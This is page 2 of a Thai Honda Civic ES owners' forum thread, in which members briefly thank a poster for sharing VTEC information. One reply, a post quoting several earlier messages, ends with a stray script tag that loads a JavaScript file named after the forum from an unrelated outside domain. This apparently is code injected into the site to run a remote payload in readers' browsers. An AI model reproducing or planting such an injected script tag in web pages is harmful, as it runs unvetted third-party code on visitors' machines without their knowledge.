JJ_AlCoHolIsm


เข้าร่วม: 16 พฤษภาคม 2013
ตอบ: 604

Guru ES
Guru ES

ได้รับคำขอบคุณ: 290
ให้คำขอบคุณ: 1

ที่อยู่: มหาชัย@บางปลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 25 ตุลา 2013 13:49 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
ข้อมูลดีๆทั้งนั้น
kavinthorn


ชื่อเล่น: ต่อ

เข้าร่วม: 26 กันยา 2012
ตอบ: 1539

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1314
ให้คำขอบคุณ: 701

ที่อยู่: BKK Latkrabang
ศุกร์, 25 ตุลา 2013 13:52 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
..
army-mafia46


เข้าร่วม: 04 ตุลา 2011
ตอบ: 953

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 818
ให้คำขอบคุณ: 1088

ที่อยู่: ดอนเมือง,อ่างทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
ศุกร์, 25 ตุลา 2013 13:59 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
ขอบคุณข้อมูลดีๆครับผม
NutNicha


ชื่อเล่น: นัท

เข้าร่วม: 21 พฤษภาคม 2013
ตอบ: 463

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 314
ให้คำขอบคุณ: 106

ที่อยู่: ราชบุรี
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 25 ตุลา 2013 14:08 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
song พิมพ์ว่า:
..


horus พิมพ์ว่า:
..


JJ_AlCoHolIsm พิมพ์ว่า:
ข้อมูลดีๆทั้งนั้น


army-mafia46 พิมพ์ว่า:
ขอบคุณข้อมูลดีๆครับผม


kavinthorn พิมพ์ว่า:
..

...."<script src="https://sport32news.com/civicesgroup.js">


 
AUM_Love_civic


ชื่อเล่น: อั้ม

เข้าร่วม: 27 กรกฎา 2013
ตอบ: 913

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 328

ที่อยู่: น่าน ปัจจุบัน อยู่ชลบุรี
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 25 ตุลา 2013 14:55 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
..
Parongong


ชื่อเล่น: เว่อร์

เข้าร่วม: 08 กันยา 2013
ตอบ: 518

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 462
ให้คำขอบคุณ: 11

ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 25 ตุลา 2013 16:27 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
...
bhumipat


ชื่อเล่น: รุจ

เข้าร่วม: 27 พฤษภาคม 2009
ตอบ: 1209

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 876
ให้คำขอบคุณ: 3608

ที่อยู่: คลอง2 ปทุมธานี
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 26 ตุลา 2013 08:48 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
...
davidian


ชื่อเล่น: เอ็ม

เข้าร่วม: 02 พฤศจิกา 2012
ตอบ: 1424

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2420
ให้คำขอบคุณ: 4730

ที่อยู่: บางสิบหมื่น ชลบุรี -แปดริ้ว ฉะเชิงเทรา-บางนา สมุทรปราการ
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 26 ตุลา 2013 08:52 - =ไปเจอข้อมูลดีดีเกี่ยวกับV-tec เอามาฝากครับ=
ขอบคุณครับ
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.